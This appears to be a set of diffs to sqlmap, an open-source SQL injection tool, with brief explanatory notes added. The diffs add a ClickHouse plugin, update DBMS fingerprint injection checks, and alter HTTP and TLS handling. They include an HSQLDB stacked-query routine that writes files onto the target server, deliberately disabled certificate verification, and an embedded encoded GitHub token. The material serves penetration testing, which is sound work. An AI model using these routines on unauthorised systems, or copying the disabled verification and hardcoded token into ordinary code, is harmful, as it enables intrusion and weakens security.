r"(?s)<li>Error Type:<br>(?P<result>.+?)</li>",
r"CDbCommand (?P<result>[^<>\n]*SQL[^<>\n]+)",
r"Code: \d+. DB::Exception: (?P<result>[^<>\n]*)",
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P<result>[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)",
r"(?P<result>query error: SELECT[^<>]+)"
@@ -428,7 +431,7 @@ META_REFRESH_REGEX = r'(?i)<meta http-equiv="?refresh"?[^>]+content="?[^">]+;\s*
JAVASCRIPT_HREF_REGEX = r'<script>\s*(\w+\.)?location\.href\s*=["\'](?P<result>[^"\']+)'

# Regular expression used for parsing empty fields in tested form data
EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=(&|\Z))'
EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=)(?=&|\Z)'
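The lookahead in the new pattern stops the trailing '&' from being consumed, so consecutive empty form fields are all reported instead of only the first. A quick comparison with made-up form data:

```python
import re

OLD = r'(&|\A)(?P<result>[^=]+=(&|\Z))'
NEW = r'(&|\A)(?P<result>[^=]+=)(?=&|\Z)'

data = "id=1&note=&token="  # hypothetical POST body with two empty fields

print([m.group("result") for m in re.finditer(OLD, data)])  # ['note=&']
print([m.group("result") for m in re.finditer(NEW, data)])  # ['note=', 'token=']
```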

# Reference: http://www.cs.ru.nl/bachelorscripties/2010/Martin_Devillers___0437999___Analyzing_password_strength.pdf
COMMON_PASSWORD_SUFFIXES = ("1", "123", "2", "12", "3", "13", "7", "11", "5", "22", "23", "01", "4", "07", "21", "14", "10", "06", "08", "8", "15", "69", "16", "6", "18")
@@ -699,7 +702,7 @@ DEFAULT_COOKIE_DELIMITER = ';'
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"

# Github OAuth token used for creating an automatic Issue for unhandled exceptions
GITHUB_REPORT_OAUTH_TOKEN = "Z2hwX2FOMDdpUWx0NDg0ak85QW4yU1pSQjhtazhBaVVlRzNaMUxmMA"
GITHUB_REPORT_OAUTH_TOKEN = "Z2hwXzJEdUdKQXVyNms3c2J2em0weXNFYlVrZ2hxczE1eDBRQnA2Vg"

# Skip unforced HashDB flush requests below the threshold number of cached items
HASHDB_FLUSH_THRESHOLD = 32

@@ -156,7 +156,8 @@ def _setRequestParams():
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*".+?)"(?<!\\")', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*".*?)"(?<!\\")', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*")"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)((true|false|null))\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
for match in re.finditer(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data):

@@ -48,8 +48,8 @@ def vulnTest():
("--dummy", ("all tested parameters do not appear to be injectable", "does not seem to be injectable", "there is not at least one", "~might be injectable")),
("-u \"<url>&id2=1\" -p id2 -v 5 --flush-session --level=5 --text-only --test-filter=\"AND boolean-based blind - WHERE or HAVING clause (MySQL comment)\"", ("~1AND",)),
("--list-tampers", ("between", "MySQL", "xforwardedfor")),
("-r <request> --flush-session -v 5 --test-skip=\"heavy\" --save=<config>", ("CloudFlare", "web application technology: Express", "possible DBMS: 'SQLite'", "User-agent: foobar", "~Type: time-based blind", "saved command line options to the configuration file")),
("-c <config>", ("CloudFlare", "possible DBMS: 'SQLite'", "User-agent: foobar", "~Type: time-based blind")),
("-r <request> --flush-session -v 5 --test-skip=\"heavy\" --save=<config>", ("CloudFlare", "web application technology: Express", "possible DBMS: 'SQLite'", "User-Agent: foobar", "~Type: time-based blind", "saved command line options to the configuration file")),
("-c <config>", ("CloudFlare", "possible DBMS: 'SQLite'", "User-Agent: foobar", "~Type: time-based blind")),
("-l <log> --flush-session --keep-alive --skip-waf -vvvvv --technique=U --union-from=users --banner --parse-errors", ("banner: '3.", "ORDER BY term out of range", "~xp_cmdshell", "Connection: keep-alive")),
("-l <log> --offline --banner -v 5", ("banner: '3.", "~[TRAFFIC OUT]")),
("-u <base> --flush-session --data=\"id=1&_=Eewef6oh\" --chunked --randomize=_ --random-agent --banner", ("fetched random HTTP User-Agent header value", "Parameter: id (POST)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.")),
@@ -147,7 +147,7 @@ def vulnTest():
handle, multiple = tempfile.mkstemp(suffix=".lst")
os.close(handle)

content = "POST / HTTP/1.0\nUser-agent: foobar\nHost: %s:%s\n\nid=1\n" % (address, port)
content = "POST / HTTP/1.0\nUser-Agent: foobar\nHost: %s:%s\n\nid=1\n" % (address, port)
with open(request, "w+") as f:
f.write(content)
f.flush()
@@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission
from __future__ import print_function

import difflib
import sqlite3
import threading
import time
import traceback
@@ -227,16 +228,19 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
if conf.get("verbose") > 1 and isinstance(ex, SqlmapValueException):
traceback.print_exc()

except:
except Exception as ex:
print()

if not kb.multipleCtrlC:
from lib.core.common import unhandledExceptionMessage
if isinstance(ex, sqlite3.Error):
raise
else:
from lib.core.common import unhandledExceptionMessage

kb.threadException = True
errMsg = unhandledExceptionMessage()
logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg))
traceback.print_exc()
kb.threadException = True
errMsg = unhandledExceptionMessage()
logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg))
traceback.print_exc()

finally:
kb.multiThreadMode = False
@@ -71,7 +71,7 @@ def update():
logger.warning(warnMsg)

if VERSION == getLatestRevision():
logger.info("already at the latest revision '%s'" % getRevisionNumber())
logger.info("already at the latest revision '%s'" % (getRevisionNumber() or VERSION))
return

message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]"

@@ -1001,6 +1001,9 @@ def cmdLineParser(argv=None):
argv[i] = argv[i].replace("--auth-creds", "--auth-cred", 1)
elif argv[i].startswith("--drop-cookie"):
argv[i] = argv[i].replace("--drop-cookie", "--drop-set-cookie", 1)
elif re.search(r"\A--tamper[^=\s]", argv[i]):
argv[i] = ""
continue
elif re.search(r"\A(--(tamper|ignore-code|skip))(?!-)", argv[i]):
key = re.search(r"\-?\-(\w+)\b", argv[i]).group(1)
index = auxIndexes.get(key, None)
@@ -441,7 +441,7 @@ class Connect(object):
requestMsg += " %s" % _http_client.HTTPConnection._http_vsn_str

# Prepare HTTP headers
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}, base=None if target else {})
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: getHeader(dict(conf.httpHeaders), HTTP_HEADER.HOST) or getHostHeader(url)}, base=None if target else {})

if HTTP_HEADER.COOKIE in headers:
cookie = headers[HTTP_HEADER.COOKIE]
@@ -453,9 +453,6 @@ class Connect(object):
headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader

if not conf.requestFile or not target:
if not getHeader(headers, HTTP_HEADER.HOST):
headers[HTTP_HEADER.HOST] = getHostHeader(url)

if not getHeader(headers, HTTP_HEADER.ACCEPT):
headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE

@@ -544,7 +541,7 @@ class Connect(object):
responseHeaders = _(ws.getheaders())
responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]

requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if hasattr(key, "capitalize") else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
requestHeaders += "\r\n".join(["%s: %s" % (u"-".join(_.capitalize() for _ in getUnicode(key).split(u'-')) if hasattr(key, "capitalize") else getUnicode(key), getUnicode(value)) for (key, value) in responseHeaders.items()])
requestMsg += "\r\n%s" % requestHeaders

if post is not None:
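Both logging paths above now normalize header names to the canonical hyphenated form instead of plain str.capitalize(), so a header such as "user-agent" is logged as "User-Agent". The transformation in isolation, with a hypothetical header name:

```python
key = "user-agent"
print(key.capitalize())                                    # User-agent
print(u"-".join(_.capitalize() for _ in key.split(u'-')))  # User-Agent
```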
@@ -583,7 +580,7 @@ class Connect(object):
else:
post, headers = req.data, req.headers

requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if hasattr(key, "capitalize") else key), getUnicode(value)) for (key, value) in req.header_items()])
requestHeaders += "\r\n".join(["%s: %s" % (u"-".join(_.capitalize() for _ in getUnicode(key).split(u'-')) if hasattr(key, "capitalize") else getUnicode(key), getUnicode(value)) for (key, value) in req.header_items()])

if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
conf.cj._policy._now = conf.cj._now = int(time.time())
@@ -752,7 +749,7 @@ class Connect(object):

responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status)

if responseHeaders:
if responseHeaders and getattr(responseHeaders, "headers", None):
logHeaders = "".join(getUnicode(responseHeaders.headers)).strip()

logHTTPTraffic(requestMsg, "%s%s\r\n\r\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_READ_SIZE]), start, time.time())
@@ -814,7 +811,7 @@ class Connect(object):
debugMsg = "got HTTP error code: %d ('%s')" % (code, status)
logger.debug(debugMsg)

except (_urllib.error.URLError, socket.error, socket.timeout, _http_client.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError, OverflowError, AttributeError, OSError):
except (_urllib.error.URLError, socket.error, socket.timeout, _http_client.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError, OverflowError, AttributeError, OSError, AssertionError, KeyError):
tbMsg = traceback.format_exc()

if conf.debug:
@@ -822,6 +819,11 @@ class Connect(object):

if checking:
return None, None, None
elif "KeyError:" in tbMsg:
if "content-length" in tbMsg:
return None, None, None
else:
raise
elif "AttributeError:" in tbMsg:
if "WSAECONNREFUSED" in tbMsg:
return None, None, None
@@ -1333,7 +1335,7 @@ class Connect(object):
compile(getBytes(re.sub(r"\s*;\s*", "\n", conf.evalCode)), "", "exec")
except SyntaxError as ex:
if ex.text:
original = replacement = ex.text.strip()
original = replacement = getUnicode(ex.text.strip())

if '=' in original:
name, value = original.split('=', 1)
@@ -27,7 +27,7 @@ try:
except ImportError:
pass

_protocols = filterNone(getattr(ssl, _, None) for _ in ("PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2"))
_protocols = filterNone(getattr(ssl, _, None) for _ in ("PROTOCOL_TLS_CLIENT", "PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2"))
_lut = dict((getattr(ssl, _), _) for _ in dir(ssl) if _.startswith("PROTOCOL_"))
_contexts = {}

@@ -69,6 +69,11 @@ class HTTPSConnection(_http_client.HTTPSConnection):
sock = create_sock()
if protocol not in _contexts:
_contexts[protocol] = ssl.SSLContext(protocol)

# Disable certificate and hostname validation enabled by default with PROTOCOL_TLS_CLIENT
_contexts[protocol].check_hostname = False
_contexts[protocol].verify_mode = ssl.CERT_NONE
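PROTOCOL_TLS_CLIENT (Python 3.6+) turns on hostname checking and certificate verification by default, which would break probing of targets with self-signed or mismatched certificates, hence the two explicit overrides above. A standalone sketch of the same idea, using only the standard ssl module:

```python
import ssl

# PROTOCOL_TLS_CLIENT defaults to check_hostname=True and CERT_REQUIRED,
# unlike the older PROTOCOL_TLSv1_2 constant
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False       # must be disabled before relaxing verify_mode
ctx.verify_mode = ssl.CERT_NONE  # accept self-signed/invalid certificates
```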

if getattr(self, "cert_file", None) and getattr(self, "key_file", None):
_contexts[protocol].load_cert_chain(certfile=self.cert_file, keyfile=self.key_file)
try:

@@ -66,7 +66,7 @@ class SmartRedirectHandler(_urllib.request.HTTPRedirectHandler):
self.redirect_request = self._redirect_request

def _redirect_request(self, req, fp, code, msg, headers, newurl):
return _urllib.request.Request(newurl.replace(' ', '%20'), data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host())
return _urllib.request.Request(newurl.replace(' ', '%20'), data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host() if hasattr(req, "get_origin_req_host") else req.origin_req_host)

def http_error_302(self, req, fp, code, msg, headers):
start = time.time()
@@ -26,6 +26,7 @@ from lib.core.common import goGoodSamaritan
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import incrementCounter
from lib.core.common import isDigit
from lib.core.common import isListLike
from lib.core.common import safeStringFormat
from lib.core.common import singleTimeWarnMessage
@@ -61,6 +62,7 @@ from lib.request.connect import Connect as Request
from lib.utils.progress import ProgressBar
from lib.utils.safe2bin import safecharencode
from lib.utils.xrange import xrange
from thirdparty import six

def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False):
"""
@@ -163,7 +165,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
else:
expressionUnescaped = unescaper.escape(expression)

if hasattr(length, "isdigit") and length.isdigit() or isinstance(length, int):
if isinstance(length, six.string_types) and isDigit(length) or isinstance(length, int):
length = int(length)
else:
length = None
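Replacing the bare str.isdigit() check with sqlmap's isDigit helper presumably guards against Unicode digit-like characters that int() rejects (the helper is imported from lib.core.common above; its exact implementation is not shown in this diff). A minimal illustration of the pitfall:

```python
length = "²"              # superscript two, e.g. from a mangled response
print(length.isdigit())   # True  -- str.isdigit() accepts Unicode digit characters
try:
    int(length)
except ValueError as ex:
    print(ex)             # invalid literal for int() with base 10: '²'
```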

@@ -7,7 +7,6 @@ See the file 'LICENSE' for copying permission

from __future__ import division

import logging
import time

from lib.core.common import Backend
@@ -387,9 +386,6 @@ def fileExists(pathFile):
kb.locks.io.release()

try:
pushValue(logger.getEffectiveLevel())
logger.setLevel(logging.CRITICAL)

runThreads(conf.threads, fileExistsThread, threadChoice=True)
except KeyboardInterrupt:
warnMsg = "user aborted during file existence "
@@ -397,7 +393,6 @@ def fileExists(pathFile):
logger.warning(warnMsg)
finally:
kb.bruteMode = False
logger.setLevel(popValue())

clearConsoleLine(True)
dataToStdout("\n")

@@ -58,6 +58,8 @@ def checkDependencies():
__import__("mimerpy")
elif dbmsName == DBMS.CUBRID:
__import__("CUBRIDdb")
elif dbmsName == DBMS.CLICKHOUSE:
__import__("clickhouse_connect")
except:
warnMsg = "sqlmap requires '%s' third-party library " % data[1]
warnMsg += "in order to directly connect to the DBMS "
30
plugins/dbms/clickhouse/__init__.py
Executable file
@@ -0,0 +1,30 @@
#!/usr/bin/env python

"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import DBMS
from lib.core.settings import CLICKHOUSE_SYSTEM_DBS
from lib.core.unescaper import unescaper

from plugins.dbms.clickhouse.enumeration import Enumeration
from plugins.dbms.clickhouse.filesystem import Filesystem
from plugins.dbms.clickhouse.fingerprint import Fingerprint
from plugins.dbms.clickhouse.syntax import Syntax
from plugins.dbms.clickhouse.takeover import Takeover
from plugins.generic.misc import Miscellaneous

class ClickHouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
    """
    This class defines ClickHouse methods
    """

    def __init__(self):
        self.excludeDbsList = CLICKHOUSE_SYSTEM_DBS

        for cls in self.__class__.__bases__:
            cls.__init__(self)

        unescaper[DBMS.CLICKHOUSE] = Syntax.escape
11
plugins/dbms/clickhouse/connector.py
Executable file
@@ -0,0 +1,11 @@
#!/usr/bin/env python

"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from plugins.generic.connector import Connector as GenericConnector

class Connector(GenericConnector):
    pass
22
plugins/dbms/clickhouse/enumeration.py
Executable file
@@ -0,0 +1,22 @@
#!/usr/bin/env python

"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.data import logger
from plugins.generic.enumeration import Enumeration as GenericEnumeration

class Enumeration(GenericEnumeration):
    def getPasswordHashes(self):
        warnMsg = "on ClickHouse it is not possible to enumerate the user password hashes"
        logger.warning(warnMsg)

        return {}

    def getRoles(self, *args, **kwargs):
        warnMsg = "on ClickHouse it is not possible to enumerate the user roles"
        logger.warning(warnMsg)

        return {}
18
plugins/dbms/clickhouse/filesystem.py
Executable file
@@ -0,0 +1,18 @@
#!/usr/bin/env python

"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem

class Filesystem(GenericFilesystem):
    def readFile(self, remoteFile):
        errMsg = "on ClickHouse it is not possible to read files"
        raise SqlmapUnsupportedFeatureException(errMsg)

    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
        errMsg = "on ClickHouse it is not possible to write files"
        raise SqlmapUnsupportedFeatureException(errMsg)
91
plugins/dbms/clickhouse/fingerprint.py
Executable file
@@ -0,0 +1,91 @@
#!/usr/bin/env python

"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.common import Backend
from lib.core.common import Format
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.session import setDbms
from lib.core.settings import CLICKHOUSE_ALIASES
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint

class Fingerprint(GenericFingerprint):
    def __init__(self):
        GenericFingerprint.__init__(self, DBMS.CLICKHOUSE)

    def getFingerprint(self):
        value = ""
        wsOsFp = Format.getOs("web server", kb.headersFp)

        if wsOsFp:
            value += "%s\n" % wsOsFp

        if kb.data.banner:
            dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)

            if dbmsOsFp:
                value += "%s\n" % dbmsOsFp

        value += "back-end DBMS: "

        if not conf.extensiveFp:
            value += DBMS.CLICKHOUSE
            return value

        actVer = Format.getDbms()
        blank = " " * 15
        value += "active fingerprint: %s" % actVer

        if kb.bannerFp:
            banVer = kb.bannerFp.get("dbmsVersion")

            if banVer:
                banVer = Format.getDbms([banVer])
                value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)

        htmlErrorFp = Format.getErrorParsedDBMSes()

        if htmlErrorFp:
            value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)

        return value

    def checkDbms(self):
        if not conf.extensiveFp and Backend.isDbmsWithin(CLICKHOUSE_ALIASES):
            setDbms(DBMS.CLICKHOUSE)

            self.getBanner()

            return True

        infoMsg = "testing %s" % DBMS.CLICKHOUSE
        logger.info(infoMsg)

        result = inject.checkBooleanExpression("halfMD5('abcd')='16356072519128051347'")

        if result:
            infoMsg = "confirming %s" % DBMS.CLICKHOUSE
            logger.info(infoMsg)
            result = inject.checkBooleanExpression("generateUUIDv4(1)!=generateUUIDv4(2)")

            if not result:
                warnMsg = "the back-end DBMS is not %s" % DBMS.CLICKHOUSE
                logger.warn(warnMsg)

                return False

            setDbms(DBMS.CLICKHOUSE)
            self.getBanner()
            return True
        else:
            warnMsg = "the back-end DBMS is not %s" % DBMS.CLICKHOUSE
            logger.warn(warnMsg)

            return False
22
plugins/dbms/clickhouse/syntax.py
Executable file
@@ -0,0 +1,22 @@
#!/usr/bin/env python

"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.convert import getOrds
from plugins.generic.syntax import Syntax as GenericSyntax

class Syntax(GenericSyntax):
    @staticmethod
    def escape(expression, quote=True):
        """
        >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT char(97)||char(98)||char(99)||char(100)||char(101)||char(102)||char(103)||char(104) FROM foobar"
        True
        """

        def escaper(value):
            return "||".join("char(%d)" % _ for _ in getOrds(value))

        return Syntax._escape(expression, quote, escaper)
28
plugins/dbms/clickhouse/takeover.py
Executable file
@@ -0,0 +1,28 @@
#!/usr/bin/env python

"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.takeover import Takeover as GenericTakeover

class Takeover(GenericTakeover):
    def osCmd(self):
        errMsg = "on ClickHouse it is not possible to execute commands"
        raise SqlmapUnsupportedFeatureException(errMsg)

    def osShell(self):
        errMsg = "on ClickHouse it is not possible to execute commands"
        raise SqlmapUnsupportedFeatureException(errMsg)

    def osPwn(self):
        errMsg = "on ClickHouse it is not possible to establish an "
        errMsg += "out-of-band connection"
        raise SqlmapUnsupportedFeatureException(errMsg)

    def osSmb(self):
        errMsg = "on ClickHouse it is not possible to establish an "
        errMsg += "out-of-band connection"
        raise SqlmapUnsupportedFeatureException(errMsg)
@@ -68,7 +68,7 @@ class Fingerprint(GenericFingerprint):
infoMsg = "testing %s" % DBMS.DERBY
logger.info(infoMsg)

result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1 {LIMIT 1 OFFSET 0})")
result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1 OFFSET 0 ROWS FETCH FIRST 1 ROW ONLY)")

if result:
infoMsg = "confirming %s" % DBMS.DERBY

@@ -87,7 +87,7 @@ class Fingerprint(GenericFingerprint):
infoMsg = "testing %s" % DBMS.H2
logger.info(infoMsg)

result = inject.checkBooleanExpression("ZERO() IS 0")
result = inject.checkBooleanExpression("ZERO()=0")

if result:
infoMsg = "confirming %s" % DBMS.H2
@@ -21,13 +21,13 @@ class Filesystem(GenericFilesystem):

@stackedmethod
def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
funcName = randomStr()
func_name = randomStr()
max_bytes = 1024 * 1024

debugMsg = "creating JLP procedure '%s'" % funcName
debugMsg = "creating JLP procedure '%s'" % func_name
logger.debug(debugMsg)

addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, max_bytes)
addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (func_name, max_bytes)
addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL "
addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'"
inject.goStacked(addFuncQuery)
@@ -47,11 +47,12 @@ class Filesystem(GenericFilesystem):
logger.debug(debugMsg)

# Reference: http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures
invokeQuery = "CALL %s('%s', CAST('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, max_bytes)
invokeQuery = "CALL %s('%s', CAST('%s' AS VARBINARY(%s)))" % (func_name, remoteFile, fcEncodedStr, max_bytes)
inject.goStacked(invokeQuery)

logger.debug("cleaning up" % funcName)
delQuery = "DELETE PROCEDURE %s" % funcName
logger.debug("cleaning up the database management system")

delQuery = "DELETE PROCEDURE %s" % func_name
inject.goStacked(delQuery)

message = "the local file '%s' has been written on the back-end DBMS" % localFile
@@ -45,13 +45,13 @@ class Fingerprint(GenericFingerprint):
# Reference: https://dev.mysql.com/doc/relnotes/mysql/<major>.<minor>/en/

versions = (
(80000, 80029), # MySQL 8.0
(80000, 80033), # MySQL 8.0
(60000, 60014), # MySQL 6.0
(50700, 50739), # MySQL 5.7
(50700, 50742), # MySQL 5.7
(50600, 50652), # MySQL 5.6
(50500, 50563), # MySQL 5.5
(50400, 50404), # MySQL 5.4
(50100, 50175), # MySQL 5.1
(50100, 50174), # MySQL 5.1
(50000, 50097), # MySQL 5.0
(40100, 40131), # MySQL 4.1
(40000, 40032), # MySQL 4.0
@@ -175,7 +175,7 @@ class Fingerprint(GenericFingerprint):
infoMsg = "testing %s" % DBMS.MYSQL
logger.info(infoMsg)

result = inject.checkBooleanExpression("QUARTER(NULL) IS NULL")
result = inject.checkBooleanExpression("QUARTER(NULL XOR NULL) IS NULL")

if result:
infoMsg = "confirming %s" % DBMS.MYSQL

@@ -131,7 +131,9 @@ class Fingerprint(GenericFingerprint):
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
logger.info(infoMsg)

if inject.checkBooleanExpression("BIT_COUNT(NULL) IS NULL"):
if inject.checkBooleanExpression("REGEXP_COUNT(NULL,NULL) IS NULL"):
Backend.setVersion(">= 15.0")
elif inject.checkBooleanExpression("BIT_COUNT(NULL) IS NULL"):
Backend.setVersion(">= 14.0")
elif inject.checkBooleanExpression("GEN_RANDOM_UUID() IS NOT NULL"):
Backend.setVersion(">= 13.0")
@@ -83,7 +83,7 @@ class Databases(object):
if not kb.data.currentDb and Backend.isDbms(DBMS.VERTICA):
kb.data.currentDb = VERTICA_DEFAULT_SCHEMA

if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE):
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.CLICKHOUSE):
warnMsg = "on %s you'll need to use " % Backend.getIdentifiedDbms()
warnMsg += "schema names for enumeration as the counterpart to database "
warnMsg += "names on other DBMSes"
@@ -108,7 +108,7 @@ class Databases(object):
warnMsg += "names will be fetched from 'mysql' database"
logger.warning(warnMsg)

elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE):
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.CLICKHOUSE):
warnMsg = "schema names are going to be used on %s " % Backend.getIdentifiedDbms()
warnMsg += "for enumeration as the counterpart to database "
warnMsg += "names on other DBMSes"
@@ -621,7 +621,7 @@ class Databases(object):
condQueryStr = "%%s%s" % colCondParam
condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList))

if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE):
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
query += condQuery

@@ -757,7 +757,7 @@ class Databases(object):
condQueryStr = "%%s%s" % colCondParam
condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList))

if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE):
query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
query += condQuery

